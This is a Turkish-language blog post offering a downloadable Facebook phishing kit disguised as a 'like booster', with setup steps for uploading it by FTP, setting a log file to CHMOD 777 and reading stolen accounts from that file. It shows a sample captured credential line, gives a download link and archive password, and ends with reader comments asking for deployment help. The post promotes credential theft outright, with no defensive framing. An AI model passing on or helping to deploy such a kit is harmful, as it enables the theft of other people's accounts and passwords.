Facebook Hesap Çalma Scripti # Kaçırma !

Etiketler :



 Beğeni hilesi gibi görünüyor, fakat hesap çalabiliyorsunuz.

Ve işte yeni Facebook phisherımız (v2):

Cevap yazdığınız için teşekkürlerPhisher Demo İçin Tıklayın!


Kurulum;
- Eklentiden indirdiğiniz dosyaları bir klasöre çıkartın.
- Dosyaları ftp'ye attıktan sonra "sanalbaron.txt" nin CHMOD ayarını 777 yapın. (bu gereklidir)
-Düşen hesapları "sanalbaron.txt" içinde görebilirsniz.

Kod:
as@hotmail.com ----Sifre----> sdasd   Ip Adresi: 88.251.197.135   Tarih: 20-08-2012 17:23:00
Scriptte sorunlar bulursanız söyleyin elimden geldiği kadarıyla düzeltmeye çalışırım, güle güle kullanın 
Cevap yazdığınız için teşekkürlerRar Şifresi: facefrm.com
İndirme Linki: Tıkla İndir

Bu Yazıyı Beğendinizmi?

4 yorum:

  1. resimli anlatırmısın kadeşim

    YanıtlaSil
  2. yapamıyorum bi video çeksen

    YanıtlaSil
  3. kardeş şu facebook admin yazısındaki linki nasıl değiştiricez ?

    YanıtlaSil
  4. videolu anlatırsan çok iyi olucak hiç bişey anlamadım FTP attım 777 verdim ee sonra nolcak onu analamdım upload ettik orda indirme linkleri oldu nası yapıcaz yani bi yol gösterin

    YanıtlaSil